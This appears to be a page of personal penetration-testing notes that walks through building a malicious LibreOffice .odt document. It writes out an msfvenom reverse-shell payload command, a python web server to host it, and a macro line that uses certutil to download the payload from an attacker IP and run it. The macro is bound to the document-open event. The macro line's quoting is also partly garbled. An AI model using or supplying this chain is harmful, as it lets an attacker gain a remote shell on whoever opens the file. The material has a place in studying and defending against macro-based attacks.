Exploitation

Getting a shell with .odt file embedded with malicious macros.

Open libreo office by typing libreoffice in terminal.

To create a macro we will go to Tools > Macros > Organize Macros > Basic

We will then create a new macro which we will name whatever we want.

We will type Shell(" ")

Anything in between those will be executed.

So although there is other ways of doing this I would rather have my payload have chances of being executed and not be caught up by an AV by using the multi/handler which automatically encodes the payload.

So we will generate our payload.

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.49.227 LPORT=443 -f exe -o lyethar-shell-reverse.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: lyethar-shell-reverse.exe

And start a python webserver on port 80.

python3 -m http.server 80                                          
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Inside the macro between the quotation marks we will paste this payload which will get our generated payload and execute it, resulting in a reverse shell.

Shell(“Cmd.exe C net use D Y * && cme.exe C certutil.exe -urlcache -split -f “”http://192.168.49.227:80/lyethar-shell.exe”” C:\Users\Public\lyethar.exe &  C:\Users\Public\lyethar.exe”)

Then we save the macro. Once saved we attach the macro to an event that will execute the macro when somebody opens the file.

We will go to Tools > Customize > Events > Open Document > Macro... > Nameofmacro > Standard > Main

Save the FIle as odt.

Upload and free money.

Code execution.

PreviousValuable Info NextPriv Escalation

Last updated 2 years ago